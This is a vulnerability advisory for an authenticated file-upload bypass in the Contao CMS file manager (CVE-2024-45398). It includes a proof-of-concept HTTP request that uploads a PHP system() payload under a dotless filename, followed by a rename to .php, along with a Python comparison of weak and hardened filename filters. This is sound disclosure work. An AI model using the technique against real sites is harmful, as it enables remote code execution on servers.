usd-2024-0013 | Arbitrary File Upload in Contao 4.13
Advisory ID: usd-2024-0013
Product: Contao
Affected Version: < 4.13.49
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE 434)
Security Risk: High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L)
Vendor URL: https://contao.org/
Vendor Acknowledged Vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-45398
CVE Link: CVE-2024-45398
Affected Component(s)
Contao File Manager
Description
Authenticated backend users with access to the file manager can bypass the upload filter, upload arbitrary files (including PHP scripts) and execute them on the server.
Proof of Concept
First, a PHP file is uploaded under a filename that contains no dot, starts with any letter and ends with an allowed file extension (here "ahtml", which ends in "html"). The upload filter only compares the end of the name against the allowed extensions and does not require a dot, so the file is accepted:
POST /contao?act=move&do=files&mode=2&pid=files%2F[...] HTTP/2
Host: localhost
[...]
-----------------------------1270547763761186843258108517
Content-Disposition: form-data; name="files"; filename="ahtml"
Content-Type: text/html

<?php system("date");?>
-----------------------------1270547763761186843258108517--
Then the file is renamed to a .php file via the file manager GUI; the rename is not subject to the upload filter. Clicking the file icon in the file manager opens the file over HTTP, and the web server executes the PHP code.
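The following is an added Python illustration of the two filter designs at play, not Contao's code and not the vendor's fix. weak_is_allowed() models an extension check that matches the end of the filename without requiring a dot (which is what lets "ahtml" through), and a file manager that does not re-validate on rename; strict_is_allowed() derives the extension from the text after the last dot, rejects names without one, rejects executable segments in double extensions, and is applied to both upload and rename. Names of functions, the extension lists and the attack() driver are assumptions made for this example; the payload is the one from the proof of concept above.

```python
import os
import re

# Constructed allowlist for the example; a real site's list is operator-configured.
ALLOWED = {"jpg", "jpeg", "png", "gif", "svg", "pdf", "html", "txt", "zip"}
# Extensions a typical PHP web server may hand to the interpreter.
EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "php7", "phps", "phar"}


def weak_is_allowed(filename):
    """Weak filter (illustrative): the name only has to END with an allowed
    extension, so 'ahtml' is accepted because it ends in 'html'."""
    name = filename.lower()
    return any(name.endswith(ext) for ext in ALLOWED)


def strict_is_allowed(filename):
    """Hardened filter: plain basename only, conservative character set,
    a dot-separated extension that is on the allowlist, and no executable
    extension hidden in an inner segment (e.g. 'shell.php.html')."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base in ("", ".", ".."):
        return False  # directory components or traversal in the name
    if not re.fullmatch(r"[A-Za-z0-9._-]+", base):
        return False  # deliberately conservative: no spaces, NULs, unicode
    root, ext = os.path.splitext(base)
    if not root or not ext:
        return False  # no extension at all: 'ahtml', '.htaccess'
    if ext[1:].lower() not in ALLOWED:
        return False
    inner = base.lower().split(".")[1:-1]
    return not any(seg in EXECUTABLE for seg in inner)


class FileManager:
    """Minimal stand-in for an upload/rename workflow (constructed for this
    example). validate_rename controls whether the filter is re-applied to
    the target name of a rename."""

    def __init__(self, validator, validate_rename):
        self.validator = validator
        self.validate_rename = validate_rename
        self.files = {}

    def upload(self, filename, content):
        if not self.validator(filename):
            return False
        self.files[filename] = content
        return True

    def rename(self, old, new):
        if old not in self.files:
            return False
        if self.validate_rename and not self.validator(new):
            return False
        self.files[new] = self.files.pop(old)
        return True


def vulnerable_manager():
    return FileManager(weak_is_allowed, validate_rename=False)


def hardened_manager():
    return FileManager(strict_is_allowed, validate_rename=True)


def attack(fm):
    """Replays the advisory's two steps (upload 'ahtml', rename to 'a.php')
    and returns (upload_accepted, rename_accepted, php_file_present)."""
    payload = b'<?php system("date");?>'
    uploaded = fm.upload("ahtml", payload)
    renamed = uploaded and fm.rename("ahtml", "a.php")
    return uploaded, renamed, "a.php" in fm.files


if __name__ == "__main__":
    print("weak filter + unchecked rename:", attack(vulnerable_manager()))
    print("strict filter + checked rename: ", attack(hardened_manager()))
```

The key design point is that the extension must be parsed (text after the last dot, absent means reject) rather than matched as a suffix, and that the same validator runs at every point where a file acquires a name, including rename and move, since an upload filter alone is bypassed by the second step of the proof of concept.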
Fix
Update to Contao 4.13.49 or later, which contains the vendor's fix. In general, assume all input is malicious and use an "accept known good" input validation strategy, i.e., a list of acceptable inputs that strictly conform to specifications; reject any input that does not strictly conform, or transform it into something that does. For file names this means deriving the extension from the part after the last dot (rejecting names that have none) and applying the same check wherever a file receives a name, including rename and move operations, not only on upload.
References
https://cwe.mitre.org/data/definitions/434.html
https://github.com/contao/contao/security/advisories/GHSA-vm6r-j788-hjh5
Timeline
- 2024-08-15: Vulnerability identified by Jakob Steeg.
- 2024-09-02: Sent first contact request.
- 2024-09-05: Contao reports that a fix is being worked on.
- 2024-09-07: Contao published fix in version 4.13.49.
- 2024-10-30: This advisory is published.
Credits
This security vulnerability was identified by Jakob Steeg of usd AG.